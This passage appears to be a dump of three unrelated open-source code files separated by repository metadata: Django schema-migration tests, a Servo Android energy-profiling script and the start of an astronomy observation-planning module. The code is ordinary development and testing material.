connection.schema_editor() as editor: editor.alter_field(BookWithO2O, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Book) self.assertEqual(columns['author_id'][0], "IntegerField") # Ensure the field is not unique anymore Book.objects.create(author=author, title="Django 1", pub_date=datetime.datetime.now()) Book.objects.create(author=author, title="Django 2", pub_date=datetime.datetime.now()) # Make sure the FK constraint is still present constraints = self.get_constraints(Book._meta.db_table) author_is_fk = False for name, details in constraints.items(): if details['columns'] == ['author_id']: if details['foreign_key'] and details['foreign_key'] == ('schema_author', 'id'): author_is_fk = True self.assertTrue(author_is_fk, "No FK constraint for author_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_alter_fk_to_o2o(self): """ #24163 - Tests altering of ForeignKey to OneToOneField """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the field is right to begin with columns = self.column_classes(Book) self.assertEqual(columns['author_id'][0], "IntegerField") # Ensure the field is not unique author = Author.objects.create(name="Joe") Book.objects.create(author=author, title="Django 1", pub_date=datetime.datetime.now()) Book.objects.create(author=author, title="Django 2", pub_date=datetime.datetime.now()) Book.objects.all().delete() # Make sure the FK constraint is present constraints = self.get_constraints(Book._meta.db_table) author_is_fk = False for name, details in constraints.items(): if details['columns'] == ['author_id']: if details['foreign_key'] and details['foreign_key'] == ('schema_author', 'id'): author_is_fk = True self.assertTrue(author_is_fk, "No FK constraint for author_id found") # Alter the ForeignKey to OneToOneField old_field = Book._meta.get_field("author") new_field = OneToOneField(Author, CASCADE) new_field.set_attributes_from_name("author") with connection.schema_editor() as editor: editor.alter_field(Book, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(BookWithO2O) self.assertEqual(columns['author_id'][0], "IntegerField") # Ensure the field is unique now BookWithO2O.objects.create(author=author, title="Django 1", pub_date=datetime.datetime.now()) with self.assertRaises(IntegrityError): BookWithO2O.objects.create(author=author, title="Django 2", pub_date=datetime.datetime.now()) # Make sure the FK constraint is present constraints = self.get_constraints(BookWithO2O._meta.db_table) author_is_fk = False for name, details in constraints.items(): if details['columns'] == ['author_id']: if details['foreign_key'] and details['foreign_key'] == ('schema_author', 'id'): author_is_fk = True self.assertTrue(author_is_fk, "No FK constraint for author_id found") def test_alter_implicit_id_to_explicit(self): """ Should be able to convert an implicit "id" field to an explicit "id" primary key field. """ with connection.schema_editor() as editor: editor.create_model(Author) old_field = Author._meta.get_field("id") new_field = IntegerField(primary_key=True) new_field.set_attributes_from_name("id") new_field.model = Author with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field, strict=True) # This will fail if DROP DEFAULT is inadvertently executed on this # field which drops the id sequence, at least on PostgreSQL. Author.objects.create(name='Foo') def test_alter_int_pk_to_autofield_pk(self): """ Should be able to rename an IntegerField(primary_key=True) to AutoField(primary_key=True). """ with connection.schema_editor() as editor: editor.create_model(IntegerPK) old_field = IntegerPK._meta.get_field('i') new_field = AutoField(primary_key=True) new_field.model = IntegerPK new_field.set_attributes_from_name('i') with connection.schema_editor() as editor: editor.alter_field(IntegerPK, old_field, new_field, strict=True) def test_alter_int_pk_to_int_unique(self): """ Should be able to rename an IntegerField(primary_key=True) to IntegerField(unique=True). """ class IntegerUnique(Model): i = IntegerField(unique=True) j = IntegerField(primary_key=True) class Meta: app_label = 'schema' apps = new_apps db_table = 'INTEGERPK' with connection.schema_editor() as editor: editor.create_model(IntegerPK) # model requires a new PK old_field = IntegerPK._meta.get_field('j') new_field = IntegerField(primary_key=True) new_field.model = IntegerPK new_field.set_attributes_from_name('j') with connection.schema_editor() as editor: editor.alter_field(IntegerPK, old_field, new_field, strict=True) old_field = IntegerPK._meta.get_field('i') new_field = IntegerField(unique=True) new_field.model = IntegerPK new_field.set_attributes_from_name('i') with connection.schema_editor() as editor: editor.alter_field(IntegerPK, old_field, new_field, strict=True) # Ensure unique constraint works. IntegerUnique.objects.create(i=1, j=1) with self.assertRaises(IntegrityError): IntegerUnique.objects.create(i=1, j=2) def test_rename(self): """ Tests simple altering of fields """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the field is right to begin with columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") self.assertNotIn("display_name", columns) # Alter the name field's name old_field = Author._meta.get_field("name") new_field = CharField(max_length=254) new_field.set_attributes_from_name("display_name") with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['display_name'][0], "CharField") self.assertNotIn("name", columns) @skipIfDBFeature('interprets_empty_strings_as_nulls') def test_rename_keep_null_status(self): """ Renaming a field shouldn't affect the not null status. """ with connection.schema_editor() as editor: editor.create_model(Note) with self.assertRaises(IntegrityError): Note.objects.create(info=None) old_field = Note._meta.get_field("info") new_field = TextField() new_field.set_attributes_from_name("detail_info") with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) columns = self.column_classes(Note) self.assertEqual(columns['detail_info'][0], "TextField") self.assertNotIn("info", columns) with self.assertRaises(IntegrityError): NoteRename.objects.create(detail_info=None) def _test_m2m_create(self, M2MFieldClass): """ Tests M2M fields on models during creation """ class LocalBookWithM2M(Model): author = ForeignKey(Author, CASCADE) title = CharField(max_length=100, db_index=True) pub_date = DateTimeField() tags = M2MFieldClass("TagM2MTest", related_name="books") class Meta: app_label = 'schema' apps = new_apps self.local_models = [ LocalBookWithM2M, LocalBookWithM2M._meta.get_field('tags').remote_field.through, ] # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(TagM2MTest) editor.create_model(LocalBookWithM2M) # Ensure there is now an m2m table there columns = self.column_classes(LocalBookWithM2M._meta.get_field("tags").remote_field.through) self.assertEqual(columns['tagm2mtest_id'][0], "IntegerField") def test_m2m_create(self): self._test_m2m_create(ManyToManyField) def test_m2m_create_custom(self): self._test_m2m_create(CustomManyToManyField) def test_m2m_create_inherited(self): self._test_m2m_create(InheritedManyToManyField) def _test_m2m_create_through(self, M2MFieldClass): """ Tests M2M fields on models during creation with through models """ class LocalTagThrough(Model): book = ForeignKey("schema.LocalBookWithM2MThrough", CASCADE) tag = ForeignKey("schema.TagM2MTest", CASCADE) class Meta: app_label = 'schema' apps = new_apps class LocalBookWithM2MThrough(Model): tags = M2MFieldClass("TagM2MTest", related_name="books", through=LocalTagThrough) class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalTagThrough, LocalBookWithM2MThrough] # Create the tables with connection.schema_editor() as editor: editor.create_model(LocalTagThrough) editor.create_model(TagM2MTest) editor.create_model(LocalBookWithM2MThrough) # Ensure there is now an m2m table there columns = self.column_classes(LocalTagThrough) self.assertEqual(columns['book_id'][0], "IntegerField") self.assertEqual(columns['tag_id'][0], "IntegerField") def test_m2m_create_through(self): self._test_m2m_create_through(ManyToManyField) def test_m2m_create_through_custom(self): self._test_m2m_create_through(CustomManyToManyField) def test_m2m_create_through_inherited(self): self._test_m2m_create_through(InheritedManyToManyField) def _test_m2m(self, M2MFieldClass): """ Tests adding/removing M2M fields on models """ class LocalAuthorWithM2M(Model): name = CharField(max_length=255) class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalAuthorWithM2M] # Create the tables with connection.schema_editor() as editor: editor.create_model(LocalAuthorWithM2M) editor.create_model(TagM2MTest) # Create an M2M field new_field = M2MFieldClass("schema.TagM2MTest", related_name="authors") new_field.contribute_to_class(LocalAuthorWithM2M, "tags") self.local_models += [new_field.remote_field.through] # Ensure there's no m2m table there self.assertRaises(DatabaseError, self.column_classes, new_field.remote_field.through) # Add the field with connection.schema_editor() as editor: editor.add_field(LocalAuthorWithM2M, new_field) # Ensure there is now an m2m table there columns = self.column_classes(new_field.remote_field.through) self.assertEqual(columns['tagm2mtest_id'][0], "IntegerField") # "Alter" the field. This should not rename the DB table to itself. with connection.schema_editor() as editor: editor.alter_field(LocalAuthorWithM2M, new_field, new_field) # Remove the M2M table again with connection.schema_editor() as editor: editor.remove_field(LocalAuthorWithM2M, new_field) # Ensure there's no m2m table there self.assertRaises(DatabaseError, self.column_classes, new_field.remote_field.through) def test_m2m(self): self._test_m2m(ManyToManyField) def test_m2m_custom(self): self._test_m2m(CustomManyToManyField) def test_m2m_inherited(self): self._test_m2m(InheritedManyToManyField) def _test_m2m_through_alter(self, M2MFieldClass): """ Tests altering M2Ms with explicit through models (should no-op) """ class LocalAuthorTag(Model): author = ForeignKey("schema.LocalAuthorWithM2MThrough", CASCADE) tag = ForeignKey("schema.TagM2MTest", CASCADE) class Meta: app_label = 'schema' apps = new_apps class LocalAuthorWithM2MThrough(Model): name = CharField(max_length=255) tags = M2MFieldClass("schema.TagM2MTest", related_name="authors", through=LocalAuthorTag) class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalAuthorTag, LocalAuthorWithM2MThrough] # Create the tables with connection.schema_editor() as editor: editor.create_model(LocalAuthorTag) editor.create_model(LocalAuthorWithM2MThrough) editor.create_model(TagM2MTest) # Ensure the m2m table is there self.assertEqual(len(self.column_classes(LocalAuthorTag)), 3) # "Alter" the field's blankness. This should not actually do anything. old_field = LocalAuthorWithM2MThrough._meta.get_field("tags") new_field = M2MFieldClass("schema.TagM2MTest", related_name="authors", through=LocalAuthorTag) new_field.contribute_to_class(LocalAuthorWithM2MThrough, "tags") with connection.schema_editor() as editor: editor.alter_field(LocalAuthorWithM2MThrough, old_field, new_field) # Ensure the m2m table is still there self.assertEqual(len(self.column_classes(LocalAuthorTag)), 3) def test_m2m_through_alter(self): self._test_m2m_through_alter(ManyToManyField) def test_m2m_through_alter_custom(self): self._test_m2m_through_alter(CustomManyToManyField) def test_m2m_through_alter_inherited(self): self._test_m2m_through_alter(InheritedManyToManyField) def _test_m2m_repoint(self, M2MFieldClass): """ Tests repointing M2M fields """ class LocalBookWithM2M(Model): author = ForeignKey(Author, CASCADE) title = CharField(max_length=100, db_index=True) pub_date = DateTimeField() tags = M2MFieldClass("TagM2MTest", related_name="books") class Meta: app_label = 'schema' apps = new_apps self.local_models = [ LocalBookWithM2M, LocalBookWithM2M._meta.get_field('tags').remote_field.through, ] # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(LocalBookWithM2M) editor.create_model(TagM2MTest) editor.create_model(UniqueTest) # Ensure the M2M exists and points to TagM2MTest constraints = self.get_constraints(LocalBookWithM2M._meta.get_field("tags").remote_field.through._meta.db_table) if connection.features.supports_foreign_keys: for name, details in constraints.items(): if details['columns'] == ["tagm2mtest_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_tagm2mtest', 'id')) break else: self.fail("No FK constraint for tagm2mtest_id found") # Repoint the M2M old_field = LocalBookWithM2M._meta.get_field("tags") new_field = M2MFieldClass(UniqueTest) new_field.contribute_to_class(LocalBookWithM2M, "uniques") self.local_models += [new_field.remote_field.through] with connection.schema_editor() as editor: editor.alter_field(LocalBookWithM2M, old_field, new_field) # Ensure old M2M is gone self.assertRaises(DatabaseError, self.column_classes, LocalBookWithM2M._meta.get_field("tags").remote_field.through) # Ensure the new M2M exists and points to UniqueTest constraints = self.get_constraints(new_field.remote_field.through._meta.db_table) if connection.features.supports_foreign_keys: for name, details in constraints.items(): if details['columns'] == ["uniquetest_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_uniquetest', 'id')) break else: self.fail("No FK constraint for uniquetest_id found") def test_m2m_repoint(self): self._test_m2m_repoint(ManyToManyField) def test_m2m_repoint_custom(self): self._test_m2m_repoint(CustomManyToManyField) def test_m2m_repoint_inherited(self): self._test_m2m_repoint(InheritedManyToManyField) @skipUnlessDBFeature('supports_column_check_constraints') def test_check_constraints(self): """ Tests creating/deleting CHECK constraints """ # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the constraint exists constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["height"] and details['check']: break else: self.fail("No check constraint for height found") # Alter the column to remove it old_field = Author._meta.get_field("height") new_field = IntegerField(null=True, blank=True) new_field.set_attributes_from_name("height") with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field, strict=True) constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["height"] and details['check']: self.fail("Check constraint for height found") # Alter the column to re-add it new_field2 = Author._meta.get_field("height") with connection.schema_editor() as editor: editor.alter_field(Author, new_field, new_field2, strict=True) constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["height"] and details['check']: break else: self.fail("No check constraint for height found") def test_unique(self): """ Tests removing and adding unique constraints to a single column. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) # Ensure the field is unique to begin with Tag.objects.create(title="foo", slug="foo") self.assertRaises(IntegrityError, Tag.objects.create, title="bar", slug="foo") Tag.objects.all().delete() # Alter the slug field to be non-unique old_field = Tag._meta.get_field("slug") new_field = SlugField(unique=False) new_field.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_field(Tag, old_field, new_field, strict=True) # Ensure the field is no longer unique Tag.objects.create(title="foo", slug="foo") Tag.objects.create(title="bar", slug="foo") Tag.objects.all().delete() # Alter the slug field to be unique new_field2 = SlugField(unique=True) new_field2.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_field(Tag, new_field, new_field2, strict=True) # Ensure the field is unique again Tag.objects.create(title="foo", slug="foo") self.assertRaises(IntegrityError, Tag.objects.create, title="bar", slug="foo") Tag.objects.all().delete() # Rename the field new_field3 = SlugField(unique=True) new_field3.set_attributes_from_name("slug2") with connection.schema_editor() as editor: editor.alter_field(Tag, new_field2, new_field3, strict=True) # Ensure the field is still unique TagUniqueRename.objects.create(title="foo", slug2="foo") self.assertRaises(IntegrityError, TagUniqueRename.objects.create, title="bar", slug2="foo") Tag.objects.all().delete() def test_unique_together(self): """ Tests removing and adding unique_together constraints on a model. """ # Create the table with connection.schema_editor() as editor: editor.create_model(UniqueTest) # Ensure the fields are unique to begin with UniqueTest.objects.create(year=2012, slug="foo") UniqueTest.objects.create(year=2011, slug="foo") UniqueTest.objects.create(year=2011, slug="bar") self.assertRaises(IntegrityError, UniqueTest.objects.create, year=2012, slug="foo") UniqueTest.objects.all().delete() # Alter the model to its non-unique-together companion with connection.schema_editor() as editor: editor.alter_unique_together(UniqueTest, UniqueTest._meta.unique_together, []) # Ensure the fields are no longer unique UniqueTest.objects.create(year=2012, slug="foo") UniqueTest.objects.create(year=2012, slug="foo") UniqueTest.objects.all().delete() # Alter it back new_field2 = SlugField(unique=True) new_field2.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_unique_together(UniqueTest, [], UniqueTest._meta.unique_together) # Ensure the fields are unique again UniqueTest.objects.create(year=2012, slug="foo") self.assertRaises(IntegrityError, UniqueTest.objects.create, year=2012, slug="foo") UniqueTest.objects.all().delete() def test_unique_together_with_fk(self): """ Tests removing and adding unique_together constraints that include a foreign key. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the fields are unique to begin with self.assertEqual(Book._meta.unique_together, ()) # Add the unique_together constraint with connection.schema_editor() as editor: editor.alter_unique_together(Book, [], [['author', 'title']]) # Alter it back with connection.schema_editor() as editor: editor.alter_unique_together(Book, [['author', 'title']], []) def test_unique_together_with_fk_with_existing_index(self): """ Tests removing and adding unique_together constraints that include a foreign key, where the foreign key is added after the model is created. """ # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(BookWithoutAuthor) new_field = ForeignKey(Author, CASCADE) new_field.set_attributes_from_name('author') editor.add_field(BookWithoutAuthor, new_field) # Ensure the fields aren't unique to begin with self.assertEqual(Book._meta.unique_together, ()) # Add the unique_together constraint with connection.schema_editor() as editor: editor.alter_unique_together(Book, [], [['author', 'title']]) # Alter it back with connection.schema_editor() as editor: editor.alter_unique_together(Book, [['author', 'title']], []) def test_index_together(self): """ Tests removing and adding index_together constraints on a model. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) # Ensure there's no index on the year/slug columns first self.assertEqual( False, any( c["index"] for c in self.get_constraints("schema_tag").values() if c['columns'] == ["slug", "title"] ), ) # Alter the model to add an index with connection.schema_editor() as editor: editor.alter_index_together(Tag, [], [("slug", "title")]) # Ensure there is now an index self.assertEqual( True, any( c["index"] for c in self.get_constraints("schema_tag").values() if c['columns'] == ["slug", "title"] ), ) # Alter it back new_field2 = SlugField(unique=True) new_field2.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_index_together(Tag, [("slug", "title")], []) # Ensure there's no index self.assertEqual( False, any( c["index"] for c in self.get_constraints("schema_tag").values() if c['columns'] == ["slug", "title"] ), ) def test_index_together_with_fk(self): """ Tests removing and adding index_together constraints that include a foreign key. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the fields are unique to begin with self.assertEqual(Book._meta.index_together, ()) # Add the unique_together constraint with connection.schema_editor() as editor: editor.alter_index_together(Book, [], [['author', 'title']]) # Alter it back with connection.schema_editor() as editor: editor.alter_index_together(Book, [['author', 'title']], []) def test_create_index_together(self): """ Tests creating models with index_together already defined """ # Create the table with connection.schema_editor() as editor: editor.create_model(TagIndexed) # Ensure there is an index self.assertEqual( True, any( c["index"] for c in self.get_constraints("schema_tagindexed").values() if c['columns'] == ["slug", "title"] ), ) def test_db_table(self): """ Tests renaming of the table """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the table is there to begin with columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") # Alter the table with connection.schema_editor() as editor: editor.alter_db_table(Author, "schema_author", "schema_otherauthor") # Ensure the table is there afterwards Author._meta.db_table = "schema_otherauthor" columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") # Alter the table again with connection.schema_editor() as editor: editor.alter_db_table(Author, "schema_otherauthor", "schema_author") # Ensure the table is still there Author._meta.db_table = "schema_author" columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") def test_indexes(self): """ Tests creation/altering of indexes """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the table is there and has the right index self.assertIn( "title", self.get_indexes(Book._meta.db_table), ) # Alter to remove the index old_field = Book._meta.get_field("title") new_field = CharField(max_length=100, db_index=False) new_field.set_attributes_from_name("title") with connection.schema_editor() as editor: editor.alter_field(Book, old_field, new_field, strict=True) # Ensure the table is there and has no index self.assertNotIn( "title", self.get_indexes(Book._meta.db_table), ) # Alter to re-add the index new_field2 = Book._meta.get_field("title") with connection.schema_editor() as editor: editor.alter_field(Book, new_field, new_field2, strict=True) # Ensure the table is there and has the index again self.assertIn( "title", self.get_indexes(Book._meta.db_table), ) # Add a unique column, verify that creates an implicit index new_field3 = BookWithSlug._meta.get_field("slug") with connection.schema_editor() as editor: editor.add_field(Book, new_field3) self.assertIn( "slug", self.get_indexes(Book._meta.db_table), ) # Remove the unique, check the index goes with it new_field4 = CharField(max_length=20, unique=False) new_field4.set_attributes_from_name("slug") with connection.schema_editor() as editor: editor.alter_field(BookWithSlug, new_field3, new_field4, strict=True) self.assertNotIn( "slug", self.get_indexes(Book._meta.db_table), ) def test_primary_key(self): """ Tests altering of the primary key """ # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) # Ensure the table is there and has the right PK self.assertTrue( self.get_indexes(Tag._meta.db_table)['id']['primary_key'], ) # Alter to change the PK id_field = Tag._meta.get_field("id") old_field = Tag._meta.get_field("slug") new_field = SlugField(primary_key=True) new_field.set_attributes_from_name("slug") new_field.model = Tag with connection.schema_editor() as editor: editor.remove_field(Tag, id_field) editor.alter_field(Tag, old_field, new_field) # Ensure the PK changed self.assertNotIn( 'id', self.get_indexes(Tag._meta.db_table), ) self.assertTrue( self.get_indexes(Tag._meta.db_table)['slug']['primary_key'], ) def test_context_manager_exit(self): """ Ensures transaction is correctly closed when an error occurs inside a SchemaEditor context. """ class SomeError(Exception): pass try: with connection.schema_editor(): raise SomeError except SomeError: self.assertFalse(connection.in_atomic_block) @skipUnlessDBFeature('supports_foreign_keys') def test_foreign_key_index_long_names_regression(self): """ Regression test for #21497. Only affects databases that supports foreign keys. """ # Create the table with connection.schema_editor() as editor: editor.create_model(AuthorWithEvenLongerName) editor.create_model(BookWithLongName) # Find the properly shortened column name column_name = connection.ops.quote_name("author_foreign_key_with_really_long_field_name_id") column_name = column_name[1:-1].lower() # unquote, and, for Oracle, un-upcase # Ensure the table is there and has an index on the column self.assertIn( column_name, self.get_indexes(BookWithLongName._meta.db_table), ) @skipUnlessDBFeature('supports_foreign_keys') def test_add_foreign_key_long_names(self): """ Regression test for #23009. Only affects databases that supports foreign keys. """ # Create the initial tables with connection.schema_editor() as editor: editor.create_model(AuthorWithEvenLongerName) editor.create_model(BookWithLongName) # Add a second FK, this would fail due to long ref name before the fix new_field = ForeignKey(AuthorWithEvenLongerName, CASCADE, related_name="something") new_field.set_attributes_from_name("author_other_really_long_named_i_mean_so_long_fk") with connection.schema_editor() as editor: editor.add_field(BookWithLongName, new_field) def test_add_foreign_object(self): with connection.schema_editor() as editor: editor.create_model(BookForeignObj) new_field = ForeignObject(Author, on_delete=CASCADE, from_fields=['author_id'], to_fields=['id']) new_field.set_attributes_from_name('author') with connection.schema_editor() as editor: editor.add_field(BookForeignObj, new_field) def test_creation_deletion_reserved_names(self): """ Tries creating a model's table, and then deleting it when it has a SQL reserved name. """ # Create the table with connection.schema_editor() as editor: try: editor.create_model(Thing) except OperationalError as e: self.fail("Errors when applying initial migration for a model " "with a table named after a SQL reserved word: %s" % e) # Check that it's there list(Thing.objects.all()) # Clean up that table with connection.schema_editor() as editor: editor.delete_model(Thing) # Check that it's gone self.assertRaises( DatabaseError, lambda: list(Thing.objects.all()), ) @skipUnlessDBFeature('supports_foreign_keys') def test_remove_constraints_capital_letters(self): """ #23065 - Constraint names must be quoted if they contain capital letters. """ def get_field(*args, **kwargs): kwargs['db_column'] = "CamelCase" field = kwargs.pop('field_class', IntegerField)(*args, **kwargs) field.set_attributes_from_name("CamelCase") return field model = Author field = get_field() table = model._meta.db_table column = field.column with connection.schema_editor() as editor: editor.create_model(model) editor.add_field(model, field) editor.execute( editor.sql_create_index % { "table": editor.quote_name(table), "name": editor.quote_name("CamelCaseIndex"), "columns": editor.quote_name(column), "extra": "", } ) editor.alter_field(model, get_field(db_index=True), field) editor.execute( editor.sql_create_unique % { "table": editor.quote_name(table), "name": editor.quote_name("CamelCaseUniqConstraint"), "columns": editor.quote_name(field.column), } ) editor.alter_field(model, get_field(unique=True), field) editor.execute( editor.sql_create_fk % { "table": editor.quote_name(table), "name": editor.quote_name("CamelCaseFKConstraint"), "column": editor.quote_name(column), "to_table": editor.quote_name(table), "to_column": editor.quote_name(model._meta.auto_field.column), } ) editor.alter_field(model, get_field(Author, CASCADE, field_class=ForeignKey), field) def test_add_field_use_effective_default(self): """ #23987 - effective_default() should be used as the field default when adding a new field. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no surname field columns = self.column_classes(Author) self.assertNotIn("surname", columns) # Create a row Author.objects.create(name='Anonymous1') # Add new CharField to ensure default will be used from effective_default new_field = CharField(max_length=15, blank=True) new_field.set_attributes_from_name("surname") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure field was added with the right default with connection.cursor() as cursor: cursor.execute("SELECT surname FROM schema_author;") item = cursor.fetchall()[0] self.assertEqual(item[0], None if connection.features.interprets_empty_strings_as_nulls else '') def test_add_field_default_dropped(self): # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no surname field columns = self.column_classes(Author) self.assertNotIn("surname", columns) # Create a row Author.objects.create(name='Anonymous1') # Add new CharField with a default new_field = CharField(max_length=15, blank=True, default='surname default') new_field.set_attributes_from_name("surname") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure field was added with the right default with connection.cursor() as cursor: cursor.execute("SELECT surname FROM schema_author;") item = cursor.fetchall()[0] self.assertEqual(item[0], 'surname default') # And that the default is no longer set in the database. field = next( f for f in connection.introspection.get_table_description(cursor, "schema_author") if f.name == "surname" ) if connection.features.can_introspect_default: self.assertIsNone(field.default) def test_alter_field_default_dropped(self): # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Create a row Author.objects.create(name='Anonymous1') self.assertEqual(Author.objects.get().height, None) old_field = Author._meta.get_field('height') # The default from the new field is used in updating existing rows. new_field = IntegerField(blank=True, default=42) new_field.set_attributes_from_name('height') with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field) self.assertEqual(Author.objects.get().height, 42) # The database default should be removed. with connection.cursor() as cursor: field = next( f for f in connection.introspection.get_table_description(cursor, "schema_author") if f.name == "height" ) if connection.features.can_introspect_default: self.assertIsNone(field.default)
bsd-3-clause
abhiQmar/servo
tests/heartbeats/characterize_android.py
139
4036
#!/usr/bin/env python # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. import sys import os from os import path import time import datetime import argparse import subprocess TOP_DIR = path.join("..", "..") GUARD_TIME = 20 SUMMARY_OUTPUT = "summary.txt" def get_command(layout_thread_count, renderer, page, profile): """Get the command to execute. """ return path.join(TOP_DIR, "mach") + " run --android" + \ " -p %d -o /sdcard/servo/output.png -y %d %s -Z profile-script-events,profile-heartbeats '%s'" % \ (profile, layout_thread_count, renderer, page) def git_rev_hash(): """Get the git revision hash. """ return subprocess.check_output(['git', 'rev-parse', 'HEAD']).rstrip() def git_rev_hash_short(): """Get the git revision short hash. """ return subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD']).rstrip() def execute(base_dir, renderer, page, profile, trial, layout_thread_count): """Run a single execution. """ log_dir = path.join(base_dir, "logs_l" + str(layout_thread_count), "trial_" + str(trial)) if os.path.exists(log_dir): print "Log directory already exists: " + log_dir sys.exit(1) os.makedirs(log_dir) # Execute cmd = get_command(layout_thread_count, renderer, page, profile) print cmd os.system(cmd) print 'sleep ' + str(GUARD_TIME) time.sleep(GUARD_TIME) # Write a file that describes this execution with open(path.join(log_dir, SUMMARY_OUTPUT), "w") as f: f.write("Datetime (UTC): " + datetime.datetime.utcnow().isoformat()) f.write("\nPlatform: Android") f.write("\nGit hash: " + git_rev_hash()) f.write("\nGit short hash: " + git_rev_hash_short()) f.write("\nLayout threads: " + str(layout_thread_count)) f.write("\nTrial: " + str(trial)) f.write("\nCommand: " + cmd) def main(): """For this script to be useful, the following conditions are needed: - Build servo for Android in release mode with the "energy-profiling" feature enabled. """ # Default number of layout threads layout_threads = 1 # Default benchmark benchmark = "https://www.mozilla.org/" # Default renderer renderer = "" # Default output directory output_dir = "heartbeat_logs" # Default profile interval profile = 60 # Parsing the input of the script parser = argparse.ArgumentParser(description="Characterize Servo timing and energy behavior on Android") parser.add_argument("-b", "--benchmark", default=benchmark, help="Gets the benchmark, for example \"-b http://www.example.com\"") parser.add_argument("-w", "--webrender", action='store_true', help="Use webrender backend") parser.add_argument("-l", "--layout_threads", help="Specify the number of threads for layout, for example \"-l 5\"") parser.add_argument("-o", "--output", help="Specify the log output directory, for example \"-o heartbeat_logs\"") parser.add_argument("-p", "--profile", default=60, help="Profiler output interval, for example \"-p 60\"") args = parser.parse_args() if args.benchmark: benchmark = args.benchmark if args.webrender: renderer = "-w" if args.layout_threads: layout_threads = int(args.layout_threads) if args.output: output_dir = args.output if args.profile: profile = args.profile if os.path.exists(output_dir): print "Output directory already exists: " + output_dir sys.exit(1) os.makedirs(output_dir) execute(output_dir, renderer, benchmark, profile, 1, layout_threads) if __name__ == "__main__": main()
mpl-2.0
pozar87/apts
apts/observations.py
1
8310
import logging from datetime import datetime, timedelta from string import Template import matplotlib.dates as mdates import numpy import pkg_resources import svgwrite as svg from matplotlib import pyplot from .conditions import Conditions from .objects.messier import Messier from .objects.planets import Planets from .utils import Utils from .constants import ObjectTableLabels logger = logging.getLogger(__name__) class Observation: NOTIFICATION_TEMPLATE = pkg_resources.resource_filename('apts', 'templates/notification.html.template') def __init__(self, place, equipment, conditions=Conditions()): self.place = place self.equipment = equipment self.conditions = conditions self.start, self.stop = self._normalize_dates( place.sunset_time(), place.sunrise_time()) self.local_messier = Messier(self.place) self.local_planets = Planets(self.place) # Compute time limit max_return_time = [int(value) for value in self.conditions.max_return.split(":")] time_limit = self.start.replace( hour=max_return_time[0], minute=max_return_time[1], second=max_return_time[2]) self.time_limit = time_limit if time_limit > self.start else time_limit + \ timedelta(days=1) def get_visible_messier(self, **args): return self.local_messier.get_visible(self.conditions, self.start, self.time_limit, **args) def get_visible_planets(self, **args): return self.local_planets.get_visible(self.conditions, self.start, self.time_limit, **args) def plot_visible_planets_svg(self, **args): visible_planets = self.get_visible_planets(**args) dwg = svg.Drawing() # Set y offset to biggest planet y = int(visible_planets[['Size']].max() + 12) # Set x offset to constant value x = 20 # Set delta to constant value minimal_delta = 52 last_radius = None for planet in visible_planets[['Name', 'Size', 'Phase']].values: name, radius, phase = planet[0], planet[1], str(round(planet[2], 2)) if last_radius is None: y += radius x += radius else: x += max(radius + last_radius + 10, minimal_delta) last_radius = radius dwg.add(svg.shapes.Circle(center=(x, y), r=radius, stroke="black", stroke_width="1", fill="#e4e4e4")) dwg.add(svg.text.Text(name, insert=(x, y + radius + 15), text_anchor='middle')) dwg.add(svg.text.Text(phase + '%', insert=(x, y - radius - 4), text_anchor='middle')) return dwg.tostring() def plot_visible_planets(self): try: from IPython.display import SVG except: logger.warning("You can plot images only in Ipython notebook!") return return SVG(self.plot_visible_planets_svg()) def _generate_plot_messier(self, **args): messier = self.get_visible_messier( )[[ObjectTableLabels.MESSIER, ObjectTableLabels.TRANSIT, ObjectTableLabels.ALTITUDE, ObjectTableLabels.WIDTH]] plot = messier.plot( 